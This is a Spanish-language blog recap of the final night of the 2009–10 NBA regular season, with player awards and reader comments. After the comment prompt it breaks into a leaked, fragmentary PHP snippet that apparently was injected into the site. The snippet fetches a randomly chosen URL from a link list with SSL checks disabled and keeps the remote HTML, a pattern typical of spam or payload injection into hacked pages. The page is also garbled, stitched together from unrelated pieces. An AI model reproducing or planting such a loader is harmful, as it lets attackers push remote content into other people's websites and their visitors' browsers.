La Crónica (14/04/2010)

15 de April de 2010 por TheDeerHunter

No va más. La regular ha terminado y las vacaciones han empezado hoy para el grueso de nuestros representantes… Marc, Sergio y Calderón. Si algo quedaba por definir era si los Raptors lograban “la machada”, o mejor dicho, si lograban enmendar el cúmulo de despropósitos que ha sido su recta final. Hicieron los deberes de última hora y destrozaron a los Knicks, pero los Bulls se trabajaron un sufrido triunfo en Charlotte y la última plaza para playoffs será para ellos. Se avecina tormenta en Toronto… pero también en Chicago.

De premio tendrán a unos descansados Cavaliers. Ayer le regalaron también la victoria a Atlanta, que terminan de forma merecida terceros en el Este. Se cruzarán en primera ronda contra el último equipo de moda del blog. Ayer los Bucks ganaron a unos Celtics con el Big Three descansando como hizo Wade ante el enfrentamiento que les espera. A su equipo le costó 2 prórrogas doblegar a los Nets.

La primera ronda en el Este se completa con un Orlando-Charlotte. Diría que los Bobcats son el equipo más equilibrado de la parte baja del cuadro pero también diría que Orlando es el peor rival que les podía tocar. Los Magic cerraron su excelente temporada en una tranquila velada contra los Sixers.

En el Oeste faltaba conocer el orden de casi todos.

Los Mavs certificaron su segunda plaza ganando a los Spurs en lo que era un reflejo deformado de lo que será la primera ronda. Los Suns conquistaron la tercera en Salt Lake City, beneficiados por la baja de Boozer. Mala suerte para los Jazz perdiendo la ventaja campo en la última jornada cuando han sido uno de los equipos más regulares de la liga en el tramo final de la misma. Su rival será Denver y el de los Suns será Portland. Los Blazers perdieron en un choque sin consecuencias contra los Warriors. Por último Lakers y Thunder afrontan su serie de forma bastante antagónica. Los Lakers lograron que Steve Blake consiguiera todo un triple doble con los Clippers pasándoles por encima y los Thunder derrotaron a los Grizzlies en otra exhibición de Durant.

En el resto de partidos, Wizards ganaron a Pacers de uno, Hornets ganaron a Rockets con un David West estratosférico y los Wolves empataron su peor marca histórica de derrotas con la 67ª que tomaron a manos de los Pistons.

Hasta el curso que viene, “temporada regular”. Ya habrá tiempo para que te volvamos a echar de menos.

PREMIOS

MVP: Stephen Curry se marcó un último partido de regular de nivel superando los 40 puntos y añadiendo 9 rebotes, 8 asistencias y 2 robos. Seguro que hace dudar a más de uno en su elección del ROY. David West ha cuajado un gran final de temporada que corona con 35 puntos, 10 rebotes y 6 asistencias. Veremos que será de su vida, y de la de los Hornets, a partir de la temporada que viene.

Rookie: Aprovechando que muchas estrellas descansaban los rookies han cuajado buenas actuaciones. A parte de Curry y Blair, Jeff Teague ha repartido 15 asistencias y anotado 24 puntos y Darren Collison se ha ido a los 26 puntos y 11 asistencias. DeRozan ha acabado el partido con 24-9 y Pendergraph con 24 puntos. Tampoco ha resultado tan mala camada.

Sorpresa: Sí, sí… No os habéis equivocado al leer el box score: Steve Blake ha conseguido un triple doble de 23 puntos, 10 rebotes y 11 asistencias. Tendrá que darle las gracias a los Lakers.

Decepción: En un partido sin ningún tipo de historia Troy Murphy se ha cascado un 1 de 10 en tiro para anotar solo 3 puntos. Blatche se lo ha comido con papas.

Esfuerzo en vano: Para un rookie, DaJuan Blair que en cuanto dispone de tiempo demuestra que es una máquina reboteadora y algo más. 27 puntos y 23 rebotes. Bestial a pesar de la derrota. Otro que vio como su equipo perdía a pesar suyo fue Trevor Ariza que esperó al último partido de la regular para cuajar su mejor actuación. Triple doble con 26 puntos, 10 rebotes y 10 asistencias.

Comenta

5 comentarios a esta entrada

  1. Love Denise dice:
    #1

    Steve Blake estará eternamente agradecido a Fisher…..que se prepare que llega Westbrook
    espero que los Magic renueven a Barnes, Redick y Jason Williams. Yo no tocaría al equipo de cara al año que viene, ni altas ni bajas.
    Lo de Durant está siendo tremendo,
    Parece que hay lío entre Del negro y sus jefes no?

      Citar

  2. sergio dice:
    #2

    No se porque tendria que asustarse tanto Fisher de Westbrook. Es un jugador que no destaca mucho en ataque, que tiene porcentajes de tiro bajos y que sobresale especialmente en contraataques y defensa… y verdaderamente dudo q tenga q aplicarse muxo en defensa salvo por algunos tiritos abiertos de el señor Derek

      Citar

  3. Txusma dice:
    #3

    Pues se dice que Paxson incluso agredió a Del Negro… Al final los Bulls se han clasificado para Playoffs y yo ya no sé si es una decepción o una sorpresa. Había equipo para más? Lo curioso es que lo han conseguido desde de el momento que se fueron Salmons y Thomas…

      Citar

  4. sergio dice:
    #4

    Como ya dije hace tiempo… Kyle Korver ha roto el récord histórico de porcentaje de triples. El año pasado fue Calderón y este Korver. A ver si el que viene se supera el de tiros de campo….

      Citar

  5. sergio dice:
    #5

    Ah! y record de triples totales en una temporada para los Magic, quitándole el récord a los Suns de la 2005-06

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>